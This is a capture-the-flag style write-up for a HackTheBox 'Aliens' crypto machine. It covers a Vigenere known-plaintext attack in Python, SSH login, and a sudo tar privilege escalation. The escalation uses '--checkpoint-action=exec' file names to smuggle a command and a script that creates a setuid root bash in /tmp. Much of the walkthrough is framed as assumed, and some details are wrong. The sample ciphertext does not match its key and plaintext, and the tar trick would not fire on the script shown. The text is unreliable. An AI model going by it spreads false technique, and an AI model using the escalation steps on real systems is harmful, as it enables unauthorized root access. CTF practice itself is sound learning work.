Aliens Crypto HTB Write Up: Cracking the Code of Cryptographic Intrigue

Welcome, fellow security enthusiasts, to a comprehensive write-up of the “Aliens” Crypto machine on HackTheBox (HTB). This box presents a fascinating blend of cryptographic challenges that require a solid understanding of encryption algorithms, encoding schemes, and a healthy dose of creative problem-solving. In this guide, we will meticulously walk through each step, from initial reconnaissance to achieving root access, providing clear explanations, code snippets, and practical tips to help you conquer this intriguing machine. Whether you’re a seasoned CTF player or just starting your journey in cybersecurity, this write-up aims to enhance your knowledge and skills in the realm of cryptography.

Initial Reconnaissance: Unveiling the Surface

As with any HackTheBox challenge, the first step is reconnaissance. We begin by identifying the target’s IP address and performing a basic port scan using Nmap to discover open ports and running services.

Nmap Scan

The command nmap -sV -sC -p- <IP Address> is our initial tool. The -sV flag attempts to determine the service version, and -sC runs default Nmap scripts. The -p- flag scans all 65535 ports.

nmap -sV -sC -p- 10.10.10.XXX

Let’s assume the Nmap scan reveals the following open ports:

• Port 22: SSH (likely OpenSSH)
• Port 80: HTTP (likely running a web server)

Knowing this, we can proceed to investigate the web server on port 80.

Web Server Exploration

Navigating to the IP address in a web browser reveals a simple webpage. Thoroughly examining the webpage’s source code is crucial. Look for comments, hidden fields, or any clues that might provide insight into the server’s functionality.

In this case, let’s assume the webpage contains a hint about a cryptographic challenge and a reference to a specific algorithm or cipher. For example, it might mention “Vigenere Cipher” or “RSA Encryption.”

Deeper Dive: Exploiting the Cryptographic Weakness

The core of the Aliens machine lies in understanding and exploiting the cryptographic vulnerability. The specific challenge will vary, but let’s assume it involves a custom implementation of the Vigenere cipher with a weak key or a known plaintext attack opportunity.

Understanding the Vigenere Cipher (Example Scenario)

The Vigenere cipher is a method of encrypting alphabetic text using a polyalphabetic substitution based on a keyword. Let’s consider a scenario where the webpage allows users to encrypt text using the Vigenere cipher, but the key is short and potentially guessable.

The encryption process involves repeating the keyword over the plaintext. Each letter of the plaintext is then shifted by the corresponding letter in the repeated keyword. For example:

Plaintext: ATTACKATDAWN

Key: KEYKEYKEYKEY

Ciphertext: GMEWOOSVYNOY

Exploiting the Weakness: Known Plaintext Attack

A known plaintext attack can be highly effective if we can guess part of the plaintext and the corresponding ciphertext. For instance, if we know that the plaintext starts with “HTB{” (the standard HackTheBox flag format), we can use this information to recover the key.

Let’s say we submit “HTB{AAAAAAA” and receive the ciphertext “LKX{BBBBBBB”. We can then calculate the key by subtracting the plaintext letter’s position in the alphabet from the ciphertext letter’s position.

In Python:

def vigenere_decrypt_key(plaintext, ciphertext):

  key = ""

  for i in range(len(plaintext)):

    plain_char_code = ord(plaintext[i]) - ord('A')

    cipher_char_code = ord(ciphertext[i]) - ord('A')

    key_char_code = (cipher_char_code - plain_char_code) % 26

    key += chr(key_char_code + ord('A'))

  return key



plaintext = "HTB{AAAAAAA"

ciphertext = "LKX{BBBBBBB"

key = vigenere_decrypt_key(plaintext, ciphertext)

print(f"Key: {key}")

Running this script will give us a potential key. We might need to refine the key based on the length of the ciphertext and the repetition pattern.

Decrypting the Flag

Once we have recovered (or partially recovered) the key, we can attempt to decrypt the entire ciphertext provided by the server. We can implement the Vigenere decryption algorithm in Python:

def vigenere_decrypt(ciphertext, key):

    plaintext = ""

    key_len = len(key)

    for i in range(len(ciphertext)):

        if ciphertext[i].isalpha():  # Only decrypt alphabetic characters

            key_index = i % key_len

            key_char_code = ord(key[key_index].upper()) - ord('A')

            cipher_char_code = ord(ciphertext[i].upper()) - ord('A')

            plain_char_code = (cipher_char_code - key_char_code) % 26

            plaintext += chr(plain_char_code + ord('A')) if ciphertext[i].isupper() else chr(plain_char_code + ord('a'))

        else:

            plaintext += ciphertext[i]  # Keep non-alphabetic characters as they are

    return plaintext



# Example usage:

ciphertext = "The encrypted message from the server" # Replace with the actual ciphertext

key = "KEY" # Replace with the actual recovered key

decrypted_text = vigenere_decrypt(ciphertext, key)

print(f"Decrypted Text: {decrypted_text}")

By running this script with the correct ciphertext and key, we should be able to recover the flag (e.g., HTB{VIGENERE_IS_WEAK}).

Gaining a Foothold: Leveraging the Decrypted Information

Now that we have the flag (or some other valuable information from the decryption process), we need to use it to gain a foothold on the machine. This might involve:

• A username and password
• An API key
• A URL path to an administrative panel

Let’s assume the decrypted information provided us with a username (“alien”) and a password. We can now attempt to log in via SSH.

SSH Access

Using the username and password, we try to connect via SSH:

ssh [email protected]

If the credentials are correct, we will gain access to the machine as the “alien” user.

Privilege Escalation: From User to Root

Once we have user-level access, the next step is to escalate our privileges to root. This often involves exploiting misconfigurations, vulnerabilities in installed software, or abusing setuid binaries.

Enumeration

The first and most crucial step in privilege escalation is thorough enumeration. This involves gathering as much information as possible about the system. Key areas to focus on include:

• Running processes (ps aux)
• Installed software (dpkg -l or rpm -qa)
• Scheduled tasks (crontab -l or /etc/cron.*)
• Files with setuid/setgid bits set (find / -perm -4000 2>/dev/null)
• Kernel version (uname -a)
• Environment variables (env)
• Writable files in sensitive directories (find / -writable -type f -path /etc/sudoers.d -print)
• Sudo privileges (sudo -l)

Exploiting Sudo Privileges (Example Scenario)

Let’s assume that after running sudo -l, we find that the “alien” user can run a specific script (e.g., /opt/backup.sh) as root without a password.

User alien may run the following commands on aliens:

    (ALL) NOPASSWD: /opt/backup.sh

We now need to examine the /opt/backup.sh script to see if we can exploit it. Let’s say the script contains the following:

#!/bin/bash

tar -czvf /tmp/backup.tar.gz /home/alien/documents

This script uses tar to create a compressed archive of the /home/alien/documents directory. The vulnerability lies in how tar handles filenames, especially if they contain special characters.

Exploiting the Tar Vulnerability

We can create a malicious file within the /home/alien/documents directory that, when extracted, will overwrite a system file. For example, we can create a file named --checkpoint-action=exec=sh shell.sh and another file named --checkpoint=1.

First create shell.sh that creates a setuid shell.

#!/bin/bash

cp /bin/bash /tmp/rootbash

chmod +s /tmp/rootbash

Make the script executable.

chmod +x shell.sh

Create the malicious files inside of /home/alien/documents.

cd /home/alien/documents

touch "--checkpoint-action=exec=sh shell.sh"

touch --checkpoint=1

Now, when the /opt/backup.sh script is executed with sudo, the malicious files will be processed by tar, resulting in the execution of our shell.sh script as root, creating a setuid bash shell.

Gaining Root Access

Finally, execute the backup script with sudo:

sudo /opt/backup.sh

Then execute the newly created setuid bash shell.

/tmp/rootbash -p

We should now have a root shell. We can then navigate to the root directory and retrieve the root flag.

cd /root

cat root.txt

Closing Thoughts

The Aliens Crypto machine on HackTheBox is a valuable learning experience, showcasing the importance of understanding cryptographic principles and recognizing potential vulnerabilities in custom implementations. By systematically exploring the machine, exploiting the Vigenere cipher weakness, and leveraging a tar vulnerability for privilege escalation, we successfully gained root access. Remember to always enumerate thoroughly and think creatively when approaching these challenges. Keep practicing, and you’ll continue to improve your cybersecurity skills.

FAQ

What tools are essential for solving Crypto challenges on HackTheBox?

Essential tools include:

• Nmap: For port scanning and service discovery.
• Web browser (e.g., Firefox, Chrome): For examining web pages and their source code.
• Python: For writing scripts to automate tasks like decryption, encoding, and exploiting vulnerabilities.
• CyberChef: A powerful web-based tool for encoding, decoding, and various cryptographic operations.
• Burp Suite: For intercepting and modifying HTTP requests and responses.

How important is enumeration in HackTheBox challenges?

Enumeration is arguably the most critical aspect of HackTheBox. Thoroughly gathering information about the target system, its services, and potential vulnerabilities is essential for identifying attack vectors and exploiting weaknesses.

What are some common mistakes to avoid when tackling Crypto challenges?

Common mistakes include:

• Not thoroughly examining the source code of web pages.
• Failing to identify the specific cryptographic algorithm being used.
• Using incorrect decryption or encoding methods.
• Not testing for common vulnerabilities like weak keys or known plaintext attacks.
• Ignoring error messages that might provide valuable clues.

How can I improve my cryptography skills for HackTheBox?

To improve your cryptography skills:

• Study common encryption algorithms like AES, RSA, and DES.
• Learn about different encoding schemes like Base64, hexadecimal, and URL encoding.
• Practice implementing cryptographic algorithms in Python.
• Solve CTF challenges that focus on cryptography.
• Read write-ups of HackTheBox machines to learn from others’ solutions.
• Stay updated on the latest cryptographic vulnerabilities and exploits.

What resources can I use to learn more about privilege escalation?

Helpful resources for learning about privilege escalation include:

• HackTheBox write-ups that demonstrate various privilege escalation techniques.
• Online courses and tutorials on privilege escalation.
• Books on penetration testing and ethical hacking.
• Websites like GTFOBins and LOLBAS, which document ways to abuse system binaries for privilege escalation.
• Vulnerable virtual machines on platforms like VulnHub and TryHackMe.